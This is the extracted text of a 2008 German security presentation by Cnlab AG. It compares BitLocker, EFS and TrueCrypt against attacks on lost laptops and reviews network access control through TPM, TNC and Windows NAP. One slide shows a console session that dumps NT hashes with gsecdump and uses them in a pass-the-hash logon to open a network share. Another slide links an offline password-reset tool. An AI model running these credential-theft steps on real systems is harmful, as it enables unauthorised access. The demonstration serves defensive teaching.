Massnahmen Verschlüsselung und Integrität

Informationssicherheit und Umgang mit ITRisiken in der Praxis
Wirksamkeit aktueller
Massnahmen
Christian Birchler / Thomas Lüthi, Cnlab AG
17. September 2008
Agenda: Sicherheit mobiler Arbeitsstationen
-
Vor- und Nachteile aktueller Verschlüsselungsverfahren
-
Integritäts-Prüfung von Arbeitsstationen
Network Access Control (NAC)
17.9.2008
2
Problemstellung
• Mobile Computer beinhalten
häufig sensitive Daten (E-Mails,
Offline-Files, BenutzerCredentials).
• Wie kann ein mobiler Computer
vor unberechtigtem Zugang
geschützt werden, wenn er
abhanden kommt (Verlust,
Diebstahl)?
17.9.2008
3
Massnahmen um Daten zu schützen
System Zustand
Bedrohung / Angriff
Massnahme
Windows-Passwort
Schutz
Physischer Zugriff:
- Harddisk ausbauen
- Passwort zurücksetzen
Harddisk verschlüsseln
Verschlüsselte
Harddisk
Online-Zugriff z.B. durch
Domain-Admin
- Auslesen der NT-Hashes
Datenverschlüsselung
Dateien verschlüsselt,
temporäre Dateien
enthalten Daten
Zugriff auf temporäre Daten,
bzw. auf System durch
Trojaner/Viren
Virenscanner einsetzten
Geschütztes System
durch Virenscanner
Nicht aktuelle VirenSignaturen, Rootkits
Installation aktueller VirenSignaturen,
Integritätsprüfung
System gemäss
definierter Policy
Zero-Day-Attacke
Harddisk-Firewall
17.9.2008
4
Mögliche Ausnutzung / Angriffe
• Unberechtigter Zugang zu
sensitiven Daten auf der
Harddisk.
• Zurücksetzen von Windows
Passwörtern.
17.9.2008
5
Zurücksetzen des Windows-Passwortes (Offline)
http://home.eunet.no/pnordahl/ntpasswd/
17.9.2008
6
Lösungsansatz
• Diskverschlüsselung:
• Microsoft Bitlocker
• TrueCrypt
• Utimaco SafeGuard
17.9.2008
7
Microsoft Bitlocker
•
Verfügbar in Windows Vista und
MS Server 2008.
Transparente Disk-Verschlüsselung von NTFS Disks mit
AES.
•
Verwendet Trusted-Computing-Technik.
•
Schlüssel können im Trusted Platform Modul (TPM) in der
PC-Hardware gespeichert werden.
•
Schlüssel werden nur freigegeben nachdem die Integrität
des Systems verifiziert wurde:
•
•
17.9.2008
–
BIOS
–
Master Boot Record
–
Boot Loader
Unterstützte Authentisierungen:
–
Ohne
–
PIN
–
USB-Schlüssel
–
Wiederherstellungskennwort
–
Wiederherstellungsschlüssel
Unterstützt eine zentrale Konfiguration und
Schlüsselhinterlegung über das Active Directory.
8
Wiederherstellungsprozess
Recovery-Passwort
Recovery-Passwort für
Notfall-Zugang zum
Device.
Optionaler PIN (preboot authentication)
Client
TPM 1.2
Firmware
MBR
als Alternative zum
PIN
Storage Root Key
Bootload.
USB Device
Alternativ zu TPM
Volume Master Key
USB Device
full-volume
encryption key
(FVEK)
schützt
BitLocker bietet Schutz
für das *Device“,
welches das FileSystem enthält.
Trusted platform
module
schützt
Windows Vista
(Enterprise und
Ultimate Edition)
PIN
(optional)
schützt
Bitlocker
File system
Volume Master Key
FVEK
File System
17.9.2008
Massnahmen um Daten zu schützen
System Zustand
Bedrohung / Angriff
Massnahme
Windows-Passwort
Schutz
Physischer Zugriff:
- Harddisk ausbauen
- Passwort zurücksetzen
Harddisk verschlüsseln
Verschlüsselte
Harddisk
- Online-Zugriff z.B. durch
Domain-Admin
- Auslesen der NT-Hashes
Datenverschlüsselung
Dateien verschlüsselt,
temporäre Dateien
enthalten Daten
Zugriff auf temporäre Daten,
bzw. auf System durch
Trojaner/Viren
Virenscanner einsetzten
Geschütztes System
durch Virenscanner
Nicht aktuelle VirenSignaturen, Rootkits
Installation aktueller VirenSignaturen,
Integritätsprüfung
System gemäss
definierter Policy
Zero-Day-Attacke
Harddisk-Firewall
17.9.2008
10
Mögliche Ausnutzung / Angriffe
• Unberechtigter Zugang zu
sensitiven Daten auf der
Harddisk.
• Auslesen von BenutzerCredentials (Hashes).
• Schutz gegen erzwungene
Bekanntgabe des Passwortes.
17.9.2008
11
Auslesen der NT-Hashes
http://www.truesec.com/PublicStore/catalog/Downloads,223.aspx
C:\gsecdump>net use z: \\struppi\tluethi
Das Kennwort oder der Benutzername ist ungültig für \\struppi\tluethi.
Geben Sie den Benutzernamen für "struppi" ein: ^C
C:\gsecdump>gsecdump -a
CNLAB\tluethi::d3492c0xxxxxxxxxxxxxxxxxxxxxxxxx:c0ea239xxxxxxxxxxxxxxxxxxxxxxxxx::::
C:\gsecdump>iam -b -h tluethi:cnlab: d3492c0xxxxxxxxxxxxxxxxxxxxxxxxx:c0ea239xxxxxxxxxxxxxxxxxxxxxxxxx
IAM v1.4 - by Hernan Ochoa ([email protected], [email protected])
Username: tluethi
Domainname: cnlab
LM hash: D3492Cxxxxxxxxxxxxxxxxxxxxxxxxx
NT hash: C0EA23xxxxxxxxxxxxxxxxxxxxxxxxx
LSASRV.DLL version: 00050001h. A280CB1h
Checking LSASRV.DLL....skipped. (-B was specified).
Trying to obtain addresses...Ok! (AC = 753E7BEC, EM = 753E56E2)
The current logon credentials were sucessfully changed!
C:\gsecdump>net use z: \\struppi\tluethi
Der Befehl wurde erfolgreich ausgeführt.
C:\gsecdump>dir Z:\
05.12.2005 23:30
17.9.2008
153'075 Bilanzgespraeche2005.pdf
12
Lösungsansatz
• Datenverschlüsselung
• Microsoft EFS
• TrueCrypt
• PGP
17.9.2008
13
Microsoft EFS
Verfügbar in allen Versionen seit
Windows 2000
• Encrypting File System (EFS) ist
eine Erweiterung des NTFSDateisystems.
• Verschlüsselt einzelne Dateien
• Einfache Aktivierung über
Dateieigenschaften.
• Jede Datei mit einem eigenen
File Encryption Key (FEK)
verschlüsseln.
• Zugang zum FEK über den EFS
Key der autorisierten Users.
• Optional: Data-Recovery-Agent
vorgesehen für Notfall-Zugriff.
17.9.2008
14
PIN
EFS
Client
DC
AUTH Cert
AUTH Private Key
User
schützt
Login Credentials
schützt
User Master Key
oder
Benutzername,
Passwort
Administrator
schützt
User EFS Private Key
schützt
DC Private Key
schützt
File Encryption Key
User Master Key
File
DC Private Key
User Master Key
User Master Key
User Key Store
FEK + File
17.9.2008
15
TrueCrypt
Free Open Source
www.truecrypt.org
17.9.2008
• Verschlüsselte virtuelle Laufwerke,
gespeichert in einer Datei.
• Verschlüsselung von gesamten
System-Partitionen (pre-boot
authentication)
• Schutz von Daten USB Memory
Sticks
• Transparenter Zugriff von allen
Anwendungen
• Schutz mit Passwort oder Key-File
• Versteckte Partitionen auf
verschlüsselten Laufwerken
• Verstecktes Betriebssystem
• Algorithmen: AES, Serpent, Twofish
16
TrueCrypt
Hidden Volumes
17.9.2008
17
Auslesen des
Passwort Hash
(√)
(√)
√
√
Kein
Schutz
Kein
Schutz
(Kein
Schutz)
EFS
Domain User
(√)
(√)
(√)
Kein
Schutz
√
Kein
Schutz
Kein
Schutz
(Kein
Schutz)
TrueCrypt
Volume
(√)
(√)
(√)
√
√
Kein
Schutz
Kein
Schutz
√
TrueCrypt
Hidden Volume
(√)
(√)
(√)
√
√
√
Kein
Schutz
√
Bitlocker
(ohne PIN)
√
√
Kein
Schutz
Kein
Schutz
Kein
Schutz
Kein
Schutz
Kein
Schutz
Kein
Schutz
Bitlocker
(mit PIN)
√
√
√
Kein
Schutz
Kein
Schutz
Kein
Schutz
√
Kein
Schutz
√
√
√
Kein
Schutz
Kein
Schutz
Kein
Schutz
√
Kein
18
Schutz
Zugriff durch
lokale Admins
(√)
Zugriff über
Netzwerk /
Windows
EFS
lokaler User
Passwort Reset
mit Boot Disk
Zugriff auf
Temporäre Files
Passwort
Bekanntgabe wird
erzwungen
Zugriff durch
Domänen Admins
Offline Auslesen
der Harddisk
Vergleich – Zugriffsschutz auf Daten in verschiedenen Szenarien
System ausgeschaltet
TrueCrypt
17.9.2008
System Volume
System in Betrieb
Strukturierung und Bewertung
Helfen die vorgeführten
technischen Massnahmen, die
Risiken von morgen besser
abschätzen und kontrollieren zu
können?
• Vollständiger Schutz gegen
externe Angriffe bietet nur eine
Disk-Verschlüsselung.
• Bitlocker bietet im Vergleich mit
True Crypt eine TPMUnterstützung sowie Integration
ins AD zur Wiederherstellung.
• EFS kann als Ergänzung zur
Disk-Verschlüsselung zum
Schutz zwischen den Benutzern
eingesetzt werden.
17.9.2008
19
Agenda: Sicherheit mobiler Arbeitsstationen
-
Vor- und Nachteile aktueller Verschlüsselungsverfahren
-
Integritäts-Prüfung von Arbeitsstationen
Network Access Control (NAC)
17.9.2008
20
Massnahmen um Daten zu schützen
System Zustand
Bedrohung / Angriff
Massnahme
Windows-Passwort
Schutz
Physischer Zugriff:
- Harddisk ausbauen
- Passwort zurücksetzen
Harddisk verschlüsseln
Verschlüsselte
Harddisk
- Online-Zugriff z.B. durch
Domain-Admin
- Auslesen der NT-Hashes
Datenverschlüsselung
Dateien verschlüsselt,
temporäre Dateien
enthalten Daten
Zugriff auf temporäre Daten,
bzw. auf System durch
Trojaner/Viren
Virenscanner einsetzten
Geschütztes System
durch Virenscanner
Nicht aktuelle VirenSignaturen, Rootkits
Installation aktueller VirenSignaturen,
Integritätsprüfung
System gemäss
definierter Policy
Zero-Day-Attacke
Harddisk-Firewall
17.9.2008
21
Konventioneller
Virenschutz
Internet
Zentrale und dezentrale
Virenscanner
Intranet
Virenscanner
Virenscanner
17.9.2008
22
Massnahmen um Daten zu schützen
System Zustand
Bedrohung / Angriff
Massnahme
Windows-Passwort
Schutz
Physischer Zugriff:
- Harddisk ausbauen
- Passwort zurücksetzen
Harddisk verschlüsseln
Verschlüsselte
Harddisk
- Online-Zugriff z.B. durch
Domain-Admin
- Auslesen der NT-Hashes
Datenverschlüsselung
Dateien verschlüsselt,
temporäre Dateien
enthalten Daten
Zugriff auf temporäre Daten,
bzw. auf System durch
Trojaner/Viren
Virenscanner einsetzten
Geschütztes System
durch Virenscanner
Nicht aktuelle VirenSignaturen, Rootkits
Installation aktueller VirenSignaturen,
Integritätsprüfung
System gemäss
definierter Policy
Zero-Day-Attacke
Harddisk-Firewall
17.9.2008
23
Internet
Problemstellung
Bedrohung der IT-Landschaft
mittels Malware auf
Arbeitsplätzen durch:
Privat / ext. MA
- Nicht kontrollierbare PCs
(z.B. private Notebooks) am
Intranet.
Intranet
- PCs ohne aktuellen oder
aktiven Schutzmechanismus
bezüglich Trojaner, Viren, etc.
- PCs ohne aktuelle
Sicherheits-Patches.
17.9.2008
 Virenscanner
 Firewall
 Patchlevel
24
Lösungsansatz
Trusted Computing
Integritäts-Prüfung
Arbeitsstationen erhalten nach
erfolgreicher Integritäts-Prüfung
Verbindung zum Intranet
Internet
Client:
- Integritäts-Prüfung
Tools für Integritäts-Prüfung
•TPM (Bitlocker)
•Trusted Network Connect (TNC)
von Trusted Computing Group
•Windows-Server 2008 / System
Health Agents (SHA)
Intranet
Policy
Enforcement
Point
•Verschiedene SHA- und SHV
(Security Health Validators)
Clients
17.9.2008
25
Bitlocker / TPM
Implementation
Client
Intranet
TPM – Trusted Platform Module
• HW module built into most of
today’s PCs
• Enables a HW Root of Trust
• Measures critical components
during trusted boot
• PTS interface allows PDP to
verify configuration and
remediate as necessary
Compliant System
TPM verified
BIOS
MBR
Boot-Loader
17.9.2008
Client Rules
TPM aktiviert
•BIOS
•MBR
•Boot-Loader
26
TNC – Trusted Network
Connect
Non-compliant System
Policy Enforcement
Point
Policy Decision
Point
Remediation
Network
Windows XP
SP2
xOSHotFix 2499
xOSHotFix 9288
AV - McAfee Virus Scan 8.0
Firewall
Client Rules
Compliant System
Windows XP
SP2
OSHotFix 2499
OSHotFix 9288
AV - Symantec AV 10.1
Firewall
17.9.2008
Corporate Network
Windows XP
•SP2
•OSHotFix 2499
•OSHotFix 9288
•AV (one of)
•Symantec AV 10.1
•McAfee Virus Scan 8.0
•Firewall
27
Microsoft Server 2008
Windows Server 2008 kennt fünf
unterschiedliche Typen von
Richtlinien zur Sicherheitsintegritätsprüfung.
Diese Richtlinien können ClientSeitig ab Windows XP durchgesetzt
werden.
•Windows-Firewall
•Virenschutz
•Spyware-Schutz
•Automatische Updates-Aktivierung
•Sicherheitsupdateschutz
17.9.2008
28
Implementation MS Server 2008 – NAP
Network Access Protection
Policy Decision
Point
Enforcement
Methods
•Ipsec
Non-compliant System
Windows XP
SP2
xOSHotFix 2499
xOSHotFix 9288
AV - McAfee Virus Scan 8.0
Firewall
•IEEE 802.1X authentisierte
netzwerkverbindung
MS Server 2008
•VPN Verbindungen
Compliant System
Windows XP
SP3
OSHotFix 2499
OSHotFix 9288
AV - Symantec AV 10.1
Firewall
17.9.2008
•DHCP Adress
Konfiguration
•Terminal Server
Gateway
Verbindungen
Client Rules
Windows XP
•SP3
•OSHotFix 2499
•OSHotFix 9288
•AV (one of)
•Symantec AV 10.1
•McAfee Virus Scan 8.0
•Firewall
29
Massnahmen um Daten zu schützen
System Zustand
Bedrohung / Angriff
Massnahme
Windows-Passwort
Schutz
Physischer Zugriff:
- Harddisk ausbauen
- Passwort zurücksetzen
Harddisk verschlüsseln
Verschlüsselte
Harddisk
- Online-Zugriff z.B. durch
Domain-Admin
- Auslesen der NT-Hashes
Datenverschlüsselung
Dateien verschlüsselt,
temporäre Dateien
enthalten Daten
Zugriff auf temporäre Daten,
bzw. auf System durch
Trojaner/Viren
Virenscanner einsetzten
Geschütztes System
durch Virenscanner
Nicht aktuelle VirenSignaturen, Rootkits
Installation aktueller VirenSignaturen,
Integritätsprüfung
System gemäss
definierter Policy
Zero-Day-Attacke
Harddisk-Firewall
17.9.2008
30
UAC
WINLOAD.EXE
Selbsttest
Boot Manager
NTFS Boot Block
NTFS Boot Sector
MBR
TPM
Schutz:
Teilweiser Schutz gegen Zero-DayAttacken:
• Missbrauch von Admin-Rechten
• Veränderung von geschützten
Teilen des OS
OSKernel
• Benutzer-Interaktion für sensitive
Aktionen verlangen („User
Access Control“)
NTOSKRNL.EXE
OSLoader
• für interaktive Anwendungen die
erhöhte Rechte erfordern.
• Treiber
Applikationen mit
Admin-Berechtigung
Secure Startup
Prinzip:
White-List-Ansatz
• Secure Startup (mit TPM)
• Kernel-Integritätstest (Selbsttest)
• Signaturüberprüfungen
Zertifikat Store
Benutzer
Interaktion
(Dialog)
Trusted Computing Plattform:
Ansätze davon in Windows Vista
Root of Trust
17.9.2008
SignaturPrüfung
31
Schutz/Überwachung durch
Bitlocker / TPM
17.9.2008
Zero-Day Exploits
Inaktive MalwareDetection Software
Inaktive Personal
Firewalls
Fehlende OS- /
Application-Patchtes
Angriff auf OS /
Treiber
Angriff durch
Hardwaretausch
Angriff auf BIOS,
MBR,
Boot-Loader
Bedrohung
von / durch
Vergleich – Wirkung von Schutzmassnahmen gegen
Bedrohungen
√
√
-
TNCImplementation
√
√
√
√
√
√
-
MS Server 2008
NAP
√
√
√
-
VistaMechanismen
√
√
√
√
(√)
32
Danke für Ihre
Aufmerksamkeit
Cnlab AG
Obere Bahnhofstrasse 32b
8640 Rapperswil
www.cnlab.ch
Christian Birchler
[email protected]
+41 55 214 33 40
Thomas Lüthi
[email protected]
+41 55 214 33 41
Präsentation verfügbar unter:
http://www.cnlab.ch/en/company/publications.html
17.9.2008
33